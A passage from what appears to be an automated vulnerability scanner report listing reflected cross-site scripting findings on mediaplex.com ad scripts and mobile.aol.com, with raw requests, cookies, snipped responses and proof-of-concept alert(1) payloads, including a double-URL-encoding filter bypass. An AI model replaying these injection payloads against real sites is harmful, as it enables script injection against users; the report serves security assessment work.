GET /content/0/10105/123060/PF_Mday11_300x600_DODControl_1Dznastchoc20asttulipchocUltmdg.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F10105-123060-1629-6%3Fmpt%3D596850302166e7"-alert(1)-"2899149135e&mpt=596850302&mpvc=http://at.atwola.com/adlink/5113/1649058/0/529/AdId=1456335;BnId=1;itime=596850302;kvugc=0;kvui=f49ac58470c911e0ba8373d1f2b58312;kvmn=93309867;kvtid=16r4opq1tvlkml;kvseg=99999:51134:50086:53380:60490:60512:50963:52615:60491:50507:53656:55401:57094:50961:52841:51182:56419:54032:51186:56673:56148:57362:56969:60203:56835:56987:56780:50220:56768:56299:56761;nodecode=yes;link= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/ads/load_v7.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:01:32 GMT
Server: Apache
Last-Modified: Wed, 04 May 2011 18:52:50 GMT
ETag: "4068a7-1072-4a277c367a480"
Accept-Ranges: bytes
Content-Length: 6032
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
<mpcke/>';
if (mpcke == 1) {
mpcclick = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F10105-123060-1629-6%3Fmpt%3D596850302166e7"-alert(1)-"2899149135e");
mpck = "http://" + mpcclick;
}
else if (mpcke == 2) {
mpcclick2 = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F10105-123060-1629-6%3Fmpt%3D596850302166e7"-alert(1)-"2899149135e");
mpck = "
...[SNIP]...

5.99. http://img.mediaplex.com/content/0/10105/123060/PF_Mday11_300x600_DODControl_1Dznastchoc20asttulipchocUltmdg.js [mpck parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/10105/123060/PF_Mday11_300x600_DODControl_1Dznastchoc20asttulipchocUltmdg.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5e8cf'%3balert(1)//be387eac33d was submitted in the mpck parameter. This input was echoed as 5e8cf';alert(1)//be387eac33d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/10105/123060/PF_Mday11_300x600_DODControl_1Dznastchoc20asttulipchocUltmdg.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F10105-123060-1629-6%3Fmpt%3D5968503025e8cf'%3balert(1)//be387eac33d&mpt=596850302&mpvc=http://at.atwola.com/adlink/5113/1649058/0/529/AdId=1456335;BnId=1;itime=596850302;kvugc=0;kvui=f49ac58470c911e0ba8373d1f2b58312;kvmn=93309867;kvtid=16r4opq1tvlkml;kvseg=99999:51134:50086:53380:60490:60512:50963:52615:60491:50507:53656:55401:57094:50961:52841:51182:56419:54032:51186:56673:56148:57362:56969:60203:56835:56987:56780:50220:56768:56299:56761;nodecode=yes;link= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/ads/load_v7.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:01:34 GMT
Server: Apache
Last-Modified: Wed, 04 May 2011 18:52:50 GMT
ETag: "4068a7-1072-4a277c367a480"
Accept-Ranges: bytes
Content-Length: 6038
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
:57094:50961:52841:51182:56419:54032:51186:56673:56148:57362:56969:60203:56835:56987:56780:50220:56768:56299:56761;nodecode=yes;link=http://altfarm.mediaplex.com/ad/ck/10105-123060-1629-6?mpt=5968503025e8cf';alert(1)//be387eac33d" target="_blank">
...[SNIP]...

5.100. http://img.mediaplex.com/content/0/10105/123060/PF_Mday11_300x600_DODControl_1Dznastchoc20asttulipchocUltmdg.js [mpvc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/10105/123060/PF_Mday11_300x600_DODControl_1Dznastchoc20asttulipchocUltmdg.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 99895"%3balert(1)//eec92958401 was submitted in the mpvc parameter. This input was echoed as 99895";alert(1)//eec92958401 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/10105/123060/PF_Mday11_300x600_DODControl_1Dznastchoc20asttulipchocUltmdg.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F10105-123060-1629-6%3Fmpt%3D596850302&mpt=596850302&mpvc=http://at.atwola.com/adlink/5113/1649058/0/529/AdId=1456335;BnId=1;itime=596850302;kvugc=0;kvui=f49ac58470c911e0ba8373d1f2b58312;kvmn=93309867;kvtid=16r4opq1tvlkml;kvseg=99999:51134:50086:53380:60490:60512:50963:52615:60491:50507:53656:55401:57094:50961:52841:51182:56419:54032:51186:56673:56148:57362:56969:60203:56835:56987:56780:50220:56768:56299:56761;nodecode=yes;link=99895"%3balert(1)//eec92958401 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/ads/load_v7.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:01:36 GMT
Server: Apache
Last-Modified: Wed, 04 May 2011 18:52:50 GMT
ETag: "4068a7-1072-4a277c367a480"
Accept-Ranges: bytes
Content-Length: 6034
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
99:51134:50086:53380:60490:60512:50963:52615:60491:50507:53656:55401:57094:50961:52841:51182:56419:54032:51186:56673:56148:57362:56969:60203:56835:56987:56780:50220:56768:56299:56761;nodecode=yes;link=99895";alert(1)//eec92958401");
mpvc = mpvclick;
}
else if (mpvce == 2) {
mpvclick2 = encodeURIComponent("http://at.atwola.com/adlink/5113/1649058/0/529/AdId=1456335;BnId=1;itime=596850302;kvugc=0;kvui=f49ac58470c911e0ba8373d1f2b
...[SNIP]...

5.101. http://img.mediaplex.com/content/0/10105/123060/PF_Mday11_300x600_DODControl_1Dznastchoc20asttulipchocUltmdg.js [mpvc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/10105/123060/PF_Mday11_300x600_DODControl_1Dznastchoc20asttulipchocUltmdg.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 813cd'%3balert(1)//22109c76d43 was submitted in the mpvc parameter. This input was echoed as 813cd';alert(1)//22109c76d43 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/10105/123060/PF_Mday11_300x600_DODControl_1Dznastchoc20asttulipchocUltmdg.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F10105-123060-1629-6%3Fmpt%3D596850302&mpt=596850302&mpvc=http://at.atwola.com/adlink/5113/1649058/0/529/AdId=1456335;BnId=1;itime=596850302;kvugc=0;kvui=f49ac58470c911e0ba8373d1f2b58312;kvmn=93309867;kvtid=16r4opq1tvlkml;kvseg=99999:51134:50086:53380:60490:60512:50963:52615:60491:50507:53656:55401:57094:50961:52841:51182:56419:54032:51186:56673:56148:57362:56969:60203:56835:56987:56780:50220:56768:56299:56761;nodecode=yes;link=813cd'%3balert(1)//22109c76d43 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/ads/load_v7.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:01:38 GMT
Server: Apache
Last-Modified: Wed, 04 May 2011 18:52:50 GMT
ETag: "4068a7-1072-4a277c367a480"
Accept-Ranges: bytes
Content-Length: 6034
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
99:51134:50086:53380:60490:60512:50963:52615:60491:50507:53656:55401:57094:50961:52841:51182:56419:54032:51186:56673:56148:57362:56969:60203:56835:56987:56780:50220:56768:56299:56761;nodecode=yes;link=813cd';alert(1)//22109c76d43http://altfarm.mediaplex.com/ad/ck/10105-123060-1629-6?mpt=596850302" target="_blank">
...[SNIP]...

5.102. http://img.mediaplex.com/content/0/10105/123060/PF_Mday11_300x600_DODControl_MdayspecchocMdelightUltmdg.js [mpck parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/10105/123060/PF_Mday11_300x600_DODControl_MdayspecchocMdelightUltmdg.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8ac50'%3balert(1)//03fc7ce85ac was submitted in the mpck parameter. This input was echoed as 8ac50';alert(1)//03fc7ce85ac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/10105/123060/PF_Mday11_300x600_DODControl_MdayspecchocMdelightUltmdg.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F10105-123060-1629-2%3Fmpt%3D5569843488ac50'%3balert(1)//03fc7ce85ac&mpt=556984348&mpvc=http://at.atwola.com/adlink/5113/1649058/0/529/AdId=1484701;BnId=1;itime=556984348;kvugc=0;kvmn=93309867;kvtid=16r4opq1tvlkml;kvseg=99999:53380:60490:52615:60491:50507:53656:55401:57094:51182:56419:56780:54057:56969:56835:56987:50220:54063:50221:56299:56673:56148:50280:60183:60130:53615;nodecode=yes;link= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/ads/load_v7.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=10105:1629/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/13198:5934/15902:34879/14302:29115/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:08 GMT
Server: Apache
Last-Modified: Wed, 04 May 2011 18:52:55 GMT
ETag: "4068ab-104f-4a277c3b3efc0"
Accept-Ranges: bytes
Content-Length: 5731
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
:55401:57094:51182:56419:56780:54057:56969:56835:56987:50220:54063:50221:56299:56673:56148:50280:60183:60130:53615;nodecode=yes;link=http://altfarm.mediaplex.com/ad/ck/10105-123060-1629-2?mpt=5569843488ac50';alert(1)//03fc7ce85ac" target="_blank">
...[SNIP]...

5.103. http://img.mediaplex.com/content/0/10105/123060/PF_Mday11_300x600_DODControl_MdayspecchocMdelightUltmdg.js [mpck parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/10105/123060/PF_Mday11_300x600_DODControl_MdayspecchocMdelightUltmdg.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d2d27"-alert(1)-"0f6b11cd576 was submitted in the mpck parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/10105/123060/PF_Mday11_300x600_DODControl_MdayspecchocMdelightUltmdg.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F10105-123060-1629-2%3Fmpt%3D556984348d2d27"-alert(1)-"0f6b11cd576&mpt=556984348&mpvc=http://at.atwola.com/adlink/5113/1649058/0/529/AdId=1484701;BnId=1;itime=556984348;kvugc=0;kvmn=93309867;kvtid=16r4opq1tvlkml;kvseg=99999:53380:60490:52615:60491:50507:53656:55401:57094:51182:56419:56780:54057:56969:56835:56987:50220:54063:50221:56299:56673:56148:50280:60183:60130:53615;nodecode=yes;link= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/ads/load_v7.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=10105:1629/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/13198:5934/15902:34879/14302:29115/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:06 GMT
Server: Apache
Last-Modified: Wed, 04 May 2011 18:52:55 GMT
ETag: "4068ab-104f-4a277c3b3efc0"
Accept-Ranges: bytes
Content-Length: 5725
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
<mpcke/>';
if (mpcke == 1) {
mpcclick = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F10105-123060-1629-2%3Fmpt%3D556984348d2d27"-alert(1)-"0f6b11cd576");
mpck = "http://" + mpcclick;
}
else if (mpcke == 2) {
mpcclick2 = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F10105-123060-1629-2%3Fmpt%3D556984348d2d27"-alert(1)-"0f6b11cd576");
mpck = "
...[SNIP]...

5.104. http://img.mediaplex.com/content/0/10105/123060/PF_Mday11_300x600_DODControl_MdayspecchocMdelightUltmdg.js [mpvc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/10105/123060/PF_Mday11_300x600_DODControl_MdayspecchocMdelightUltmdg.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c482d'%3balert(1)//486db0490f6 was submitted in the mpvc parameter. This input was echoed as c482d';alert(1)//486db0490f6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/10105/123060/PF_Mday11_300x600_DODControl_MdayspecchocMdelightUltmdg.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F10105-123060-1629-2%3Fmpt%3D556984348&mpt=556984348&mpvc=http://at.atwola.com/adlink/5113/1649058/0/529/AdId=1484701;BnId=1;itime=556984348;kvugc=0;kvmn=93309867;kvtid=16r4opq1tvlkml;kvseg=99999:53380:60490:52615:60491:50507:53656:55401:57094:51182:56419:56780:54057:56969:56835:56987:50220:54063:50221:56299:56673:56148:50280:60183:60130:53615;nodecode=yes;link=c482d'%3balert(1)//486db0490f6 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/ads/load_v7.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=10105:1629/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/13198:5934/15902:34879/14302:29115/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:12 GMT
Server: Apache
Last-Modified: Wed, 04 May 2011 18:52:55 GMT
ETag: "4068ab-104f-4a277c3b3efc0"
Accept-Ranges: bytes
Content-Length: 5727
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
kvtid=16r4opq1tvlkml;kvseg=99999:53380:60490:52615:60491:50507:53656:55401:57094:51182:56419:56780:54057:56969:56835:56987:50220:54063:50221:56299:56673:56148:50280:60183:60130:53615;nodecode=yes;link=c482d';alert(1)//486db0490f6http://altfarm.mediaplex.com/ad/ck/10105-123060-1629-2?mpt=556984348" target="_blank">
...[SNIP]...

5.105. http://img.mediaplex.com/content/0/10105/123060/PF_Mday11_300x600_DODControl_MdayspecchocMdelightUltmdg.js [mpvc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/10105/123060/PF_Mday11_300x600_DODControl_MdayspecchocMdelightUltmdg.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 64fa4"%3balert(1)//33dbfc603f5 was submitted in the mpvc parameter. This input was echoed as 64fa4";alert(1)//33dbfc603f5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/10105/123060/PF_Mday11_300x600_DODControl_MdayspecchocMdelightUltmdg.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F10105-123060-1629-2%3Fmpt%3D556984348&mpt=556984348&mpvc=http://at.atwola.com/adlink/5113/1649058/0/529/AdId=1484701;BnId=1;itime=556984348;kvugc=0;kvmn=93309867;kvtid=16r4opq1tvlkml;kvseg=99999:53380:60490:52615:60491:50507:53656:55401:57094:51182:56419:56780:54057:56969:56835:56987:50220:54063:50221:56299:56673:56148:50280:60183:60130:53615;nodecode=yes;link=64fa4"%3balert(1)//33dbfc603f5 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/ads/load_v7.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=10105:1629/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/13198:5934/15902:34879/14302:29115/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:10 GMT
Server: Apache
Last-Modified: Wed, 04 May 2011 18:52:55 GMT
ETag: "4068ab-104f-4a277c3b3efc0"
Accept-Ranges: bytes
Content-Length: 5727
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
kvtid=16r4opq1tvlkml;kvseg=99999:53380:60490:52615:60491:50507:53656:55401:57094:51182:56419:56780:54057:56969:56835:56987:50220:54063:50221:56299:56673:56148:50280:60183:60130:53615;nodecode=yes;link=64fa4";alert(1)//33dbfc603f5");
mpvc = mpvclick;
}
else if (mpvce == 2) {
mpvclick2 = encodeURIComponent("http://at.atwola.com/adlink/5113/1649058/0/529/AdId=1484701;BnId=1;itime=556984348;kvugc=0;kvmn=93309867;kvtid=16r4opq1tvlk
...[SNIP]...

5.106. http://mobile.aol.com/product/Android/dailyfinance/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mobile.aol.com
Path:   /product/Android/dailyfinance/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5df73%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e303fb8370dc was submitted in the REST URL parameter 2. This input was echoed as 5df73</script><script>alert(1)</script>303fb8370dc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /product/Android5df73%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e303fb8370dc/dailyfinance/ HTTP/1.1
Host: mobile.aol.com
Proxy-Connection: keep-alive
Referer: http://mobile.aol.com/product/iPhone/engadget/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304617406288-Repeat%7C1367689406288%3B%20s_nrgvo%3DRepeat%7C1367689406289%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolmobdash%252Caolsvc%253D%252526pid%25253Dmbd%25252520%2525253A%25252520Engadget%25252520-%25252520iPhone%25252520App%25252520-%25252520iPhone%25252520Applications%25252520from%25252520AOL%25252520Mobile%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//mobile.aol.com/product/Android/dailyfinance/%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:45:37 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 13:45:37 GMT; path=/
Content-Type: text/html
Content-Length: 23720

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head> <!-- 1 to 100
...[SNIP]...
ID="mbd";
   s_265.pageName="mbd : "+document.title;
   s_265.server="";
   s_265.channel="us.mbdash";
   s_265.pageType="";
   s_265.linkInternalFilters="javascript:,mobile.aol.com";
   s_265.prop1="Android5df73</script><script>alert(1)</script>303fb8370dc";
   s_265.prop2="dailyfinance";
   s_265.mmxgo = true;
   s_265.prop12=document.location;
   s_265.t();
}
var s_account = "aolmobdash,aolsvc";
(function(){
   var d = document, s = d.createElement('scr
...[SNIP]...

5.107. http://mobile.aol.com/product/Android/dailyfinance/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mobile.aol.com
Path:   /product/Android/dailyfinance/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cd897%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5bc98c24ff1 was submitted in the REST URL parameter 2. This input was echoed as cd897</script><script>alert(1)</script>5bc98c24ff1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /product/Androidcd897%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5bc98c24ff1/dailyfinance/ HTTP/1.1
Host: mobile.aol.com
Proxy-Connection: keep-alive
Referer: http://mobile.aol.com/product/iPhone/engadget/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
